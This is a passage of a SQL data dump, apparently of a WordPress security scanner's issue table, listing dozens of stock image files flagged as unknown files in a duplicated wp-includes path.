More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/arrow-pointer-blue-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33996,1631564688,1631564688,'new','knownfile',75,'967bf3a2b57e7f0ca3d70e8d6a12992f','5bbe7be3d8f1bc9f056424a61bd8a11c','Unknown file in WordPress core: wp-includes/wp-includes/images/arrow-pointer-blue.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/arrow-pointer-blue.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33997,1631564688,1631564688,'new','knownfile',75,'2d78fd374e8a1115e482467b03ac7eb1','61e7e946cdc564ebea9d885633ae8a32','Unknown file in WordPress core: wp-includes/wp-includes/images/blank.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/images/blank.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33998,1631564688,1631564688,'new','knownfile',75,'588c3a290f8655cc7d80e70758d81612','2d63f83e56e874c5c5a429650cfebce2','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/archive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/archive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33999,1631564688,1631564688,'new','knownfile',75,'ec434c9dba33710118a0e20b919461b6','08b38c690bc0530f93ac15c59c2f13a2','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/crystal/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34000,1631564688,1631564688,'new','knownfile',75,'ce02307813608de9312d456d7059fa85','746921b236a90339dfde4fb45f65782c','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/code.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/crystal/code.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34001,1631564688,1631564688,'new','knownfile',75,'da70d587ab9fe48410af000aa1cc3c64','9a1fa68d2e9e72ab8531382d60eb2a60','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/default.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/default.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34002,1631564688,1631564688,'new','knownfile',75,'7a340ecb4609cb704fccc697e1793b19','b209b0349bcc927379238d1a4b2b7b8e','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/document.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/crystal/document.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34003,1631564689,1631564689,'new','knownfile',75,'63532a26d5918e4a10b5c0e31e1d16a8','aa52acca9dfde1c1b24bd1b5e7fc6669','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/interactive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/crystal/interactive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34004,1631564689,1631564689,'new','knownfile',75,'30be4624775aa5fcf2d2e4baaaee7603','98cf4e44f091ac48435ca836f9e2d08c','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/crystal/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34005,1631564689,1631564689,'new','knownfile',75,'13d18ea1ec18e482a9857caf12528d90','3c221cb15bb39134a9d5877fdbb46770','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/spreadsheet.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/images/crystal/spreadsheet.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34006,1631564689,1631564689,'new','knownfile',75,'b86b4af973a19231b401339cce5b7619','1f31a3d78b862014ee472e7abc08dc14','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/text.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/crystal/text.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34007,1631564689,1631564689,'new','knownfile',75,'a8c2ffe6e8e85783f5db41540bd7368e','01fcc960ee73763297d09d4f6002c89d','Unknown file in WordPress core: wp-includes/wp-includes/images/crystal/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/crystal/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34008,1631564689,1631564689,'new','knownfile',75,'85587d61d71f5feffa27219a6c98e4fa','8c3a05ad361c4a150e71346548a72ee7','Unknown file in WordPress core: wp-includes/wp-includes/images/down_arrow-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/down_arrow-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34009,1631564689,1631564689,'new','knownfile',75,'7f1087ff09a2a948669b9d87470b6d74','3315b08f593710fa09320cb41386ad30','Unknown file in WordPress core: wp-includes/wp-includes/images/down_arrow.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/down_arrow.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34010,1631564689,1631564689,'new','knownfile',75,'d04c3752c9e680a120f862a8dac09aa7','ce64dfd0d668d16503931d46a2f7306b','Unknown file in WordPress core: wp-includes/wp-includes/images/icon-pointer-flag-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/icon-pointer-flag-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34011,1631564689,1631564689,'new','knownfile',75,'705d01be6c08052a6af003d32f674321','a10192482290d1eb2ee2dedc8434c0a2','Unknown file in WordPress core: wp-includes/wp-includes/images/icon-pointer-flag.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/icon-pointer-flag.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34012,1631564689,1631564689,'new','knownfile',75,'9a0c99a85af977503c819f19adf709d0','4c0117bb251606c8e4f8d1d4980503a9','Unknown file in WordPress core: wp-includes/wp-includes/images/media/archive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/media/archive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34013,1631564689,1631564689,'new','knownfile',75,'635a9b54f3cd6daaf2d0aebde578362d','361e7338dfc1b0d75996cb78f8e8fc87','Unknown file in WordPress core: wp-includes/wp-includes/images/media/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/media/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34014,1631564689,1631564689,'new','knownfile',75,'b1bd8313257a076cee2398d3a0718171','ee4256b87b85fe0f1664b7a953c97982','Unknown file in WordPress core: wp-includes/wp-includes/images/media/code.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/media/code.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34015,1631564689,1631564689,'new','knownfile',75,'8b2cfd91a55fa69a53e06a61d9a30157','ac47425d045753b432f91792368e1e61','Unknown file in WordPress core: wp-includes/wp-includes/images/media/default.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/media/default.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34016,1631564689,1631564689,'new','knownfile',75,'2310501c686351d29455e89a2d13f207','674520148ba5639be10acbed92fb2483','Unknown file in WordPress core: wp-includes/wp-includes/images/media/document.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/images/media/document.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34017,1631564689,1631564689,'new','knownfile',75,'eae3488532bb74c52c40933fe5a457b8','56776aad8e63861f3f544b3227b4f8a1','Unknown file in WordPress core: wp-includes/wp-includes/images/media/interactive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/media/interactive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34018,1631564689,1631564689,'new','knownfile',75,'1632314f3bff55e31a623fe449c4e82c','b1d68e4fbefc2b5d6f3b1a7334169f09','Unknown file in WordPress core: wp-includes/wp-includes/images/media/spreadsheet.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/media/spreadsheet.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34019,1631564689,1631564689,'new','knownfile',75,'70f902682a9b0bcf133fb4f54182f6b8','6afe7764d4795e5a1acbf74bdeb67726','Unknown file in WordPress core: wp-includes/wp-includes/images/media/text.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/media/text.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34020,1631564689,1631564689,'new','knownfile',75,'6f5c43372c266c8c6007027a1dc0e4fc','afbb2a6e912cb9fef48a50cfa347625a','Unknown file in WordPress core: wp-includes/wp-includes/images/media/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/media/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34021,1631564689,1631564689,'new','knownfile',75,'6531a30f81336b45d13a08c29cab06f0','e35708736def021f11239257bd015e9d','Unknown file in WordPress core: wp-includes/wp-includes/images/rss-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/rss-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34022,1631564689,1631564689,'new','knownfile',75,'7eb9c94d7823740a2ffc879ca4ba8987','27caf51464222d98203807a533b5d24d','Unknown file in WordPress core: wp-includes/wp-includes/images/rss.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/images/rss.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34023,1631564689,1631564689,'new','knownfile',75,'7447661fa0d827223a9d8366b2b0ee09','13e16a460355010574fc3fbb8f0e7b3a','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/frownie.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/smilies/frownie.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34024,1631564689,1631564689,'new','knownfile',75,'709eac71ca2a542d613ebd360a75d3f6','789c7380f78db9f89a95be9fc7b73d26','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_arrow.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/smilies/icon_arrow.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34025,1631564689,1631564689,'new','knownfile',75,'2d6032a218ef3812c153b86a99c7ddde','a0fa2e00b7b002e685afd5b8c7f1df4a','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_biggrin.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_biggrin.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34026,1631564689,1631564689,'new','knownfile',75,'e3449acb9e1f0d1686992dbff342a803','1bcbed50c8a598fb1dc3160b0e55d077','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_confused.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_confused.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34027,1631564689,1631564689,'new','knownfile',75,'adfabbe2648a0133c5cb2c0eb1a6e520','842f22bb8a3b8054cafaa498663aa253','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_cool.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_cool.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34028,1631564689,1631564689,'new','knownfile',75,'a8628938ae77481c062268144e9243f5','70032ca3dcebe1bdcc93bca354b68812','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_cry.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_cry.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34029,1631564689,1631564689,'new','knownfile',75,'a277ba3b112ecd4fdc07ca0322ca425f','8c83be9c3eee076a98e751909f6bdef6','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_eek.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_eek.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34030,1631564689,1631564689,'new','knownfile',75,'0ab3012409f843b523fcc7d2c82fb0b2','bb6a5b89b855c6655ed1528039d79687','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_evil.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_evil.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34031,1631564689,1631564689,'new','knownfile',75,'7a42490a29678a03b67bb322fa9cf2b2','e617d647225180e6fe3b61e6809c1245','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_exclaim.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_exclaim.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34032,1631564689,1631564689,'new','knownfile',75,'f1ae79b2a2bcd3fd59f99fcee5a98a83','24b04c1580c9e7a9c4cdfda744eddf73','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_idea.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_idea.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34033,1631564689,1631564689,'new','knownfile',75,'1a3767d4985c4dbb77411a3380f74a6a','b5ae4c64b5c52d736b9b9d1822aadc42','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_lol.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_lol.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34034,1631564689,1631564689,'new','knownfile',75,'09ad9906f8325fb2dfd1996232a323d1','e77780ba73ec0c9f84a759efac0e1193','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_mad.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_mad.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34035,1631564689,1631564689,'new','knownfile',75,'2bd89291d24b1ac4df813a6d8891241e','c158941a5d7b0257d923bbcbd0724897','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_mrgreen.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 